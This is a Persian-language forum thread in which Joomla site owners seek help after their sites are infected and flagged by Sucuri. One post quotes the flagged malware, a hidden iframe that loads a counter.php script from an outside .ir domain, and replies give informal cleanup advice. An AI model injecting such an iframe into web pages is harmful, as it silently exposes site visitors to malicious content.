eskafild

ویروسی شدن سایت

15 پست در این موضوع

سلام

یکی از سایتهام ویروسی شده، فایل ها را با ویروس کش اسکن کردم چیزی پیدا نکردم چیکار باید کنم؟

آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش html و css آموزش لاراول آموزش cPanel آموزش php آموزش سئو وردپرس آموزش امنیت وردپرس آموزش وردپرس آموزش فرم ساز RSform آموزش سئو جوملا آموزش فروشگاه ساز Hikashop آموزش فروشگاه ساز ویرچومارت آموزش طراحی سایت آگهی تبلیغاتی آموزش امنیت جوملا آموزش طراحی سایت فروش فایل آموزش طراحی قالب ریسپانسیو با Helix آموزش جوملا 3 آموزش ساخت ربات دکمه ی شیشه ای آموزش ساخت ربات همکاری در فروش آموزش ساخت ربات جذب ممبر آموزش ساخت ربات ضد اسپم آموزش ساخت ربات پیوست فایل سورس ربات مدیر گروه | ربات مدیر گروه همسریابی

سلام . اول از همه سریعا اخرین backup سالم رو اگر داری برگردون یا به مدیر سرور تیکت بزن برات برگردونه

درود

بهترین راه این هست که از کل اطلاعات بکاپ بگیرید و داخل لوکال بالا بیارید و بعد کل فایل ها رو بررسی و اسکن کنید

ضمنا منظورتون از ویروس چیه دقیقا؟؟ مشکلی الان واستون ایجاد کرده چیه؟

من تو سایت آنلاین ویروس یابی بررسی کردم که ایراد زیر رو گرفت:

Known javascript malware.

Details: Sucuri Malware Signatures

</html><iframe src="http://hashtroodcity.ir/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

فایل مورد نظر ویروسی بود پاکش کردم ولی مشکل حل نشد باز همون ایراد رو می گیره سایته، چه کنم؟

http://sitecheck.sucuri.net/scanner/

تکه کدی که به قالب شما اضافه میشه مخرب هست و پاک هم کنید مجدد اضافه میشه چون از قالب نال شده استفاده کردید و فایلهای داخلش هست که مجدد توی هاست شما تغییرات ایجاد میکنه

بهتره علاوه بر آپدیت جوملا افزونه های امنیتی نصب کنید و قالب را از وجود فایلهای مخرب با آوردن کل سایت روی لوکال پاکسازی کنید

ممنون، میشه بگید تو کدوم فایله اون کد؟

چون من قالب هم که تغییر دادم باز خطای بدافزار اومد؟

دوست گرامی فایل counter.php رو یک بار حذف بفرمایین و مجدداً اسکن کنین انشاء الله حل میشه

خطایی که میده از همین فایل هست و شما حذف کردین پس نباید مشکلی داشته باشه من قبل از حذف این فایل سایتتون رو بررسی کردم نود 32 خطا می داد اما الان خیر همچنین با Is This Website Safe | Website Security | Norton Safe Web تست کردم سایتتون مشکلی نداشت.

با سلام

در صورت نیاز از کل هاستتون بکاپ تهیه کنید.لینک بدید تا دانلود کنم اوکی کنم براتون بفرستم.(فایل رو اینجا نزارید.اگه خواستین پیام خصوصی کنین)

قبل از ارسال فایل پاکسازی شده ، میبایست که فولدر Public_Html هاست رو هم پاک کنید. و پیشنهاد بهتر اینه که از هاستتوون بخواید که مجددا اکانتتون رو ایجاد کنن و در اختیارتون بگذارند.

بهترین کار همینه....

موفق باشید وس ربلند

با سلام

دوستان چند وقت پیش سایتم از دسترس خارج شد وقتی به هاست مراجعه کردم دیدم تعداد خیلی زیادی فایل عجیب و غریب توی روت ایجاد شده. سایت رو دانلود کردم چند تا ویروس پیدا شد اما خب دیگه سایت کلا از کار افتاده بود.

همه فایلها رو پاک کردم دوباره جوملا رو نصب کردم و دوباره بک آپ دیتا بیس رو لود کردم. اما چند روز گذشت و دوباره سایت از کار افتاد و به دلیل اسپم کردن توسط مدیر سرور بلاک شد.

امروز همه اطلاعات رو پاک کردم دوباره نصب کردم. آیا ممکنه با برگردونن بک آپ دیتا بیس دوباره ویروسی بشه سایت. یعنی دیتا بیس هم ویروسی میشه ؟

هر جایی ممکنه باشه. شل باشه. بک دور باشه. قطعه کد. افزونه. حتی باگ امنیتی خود جوملا.

یا مشکل امنیتی هاست.

از هاست بخواید بررسی کنند حمله ای صورت گرفته یا خیر..اطلاعاتی رو میتونن در اختیار شما بذارند

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری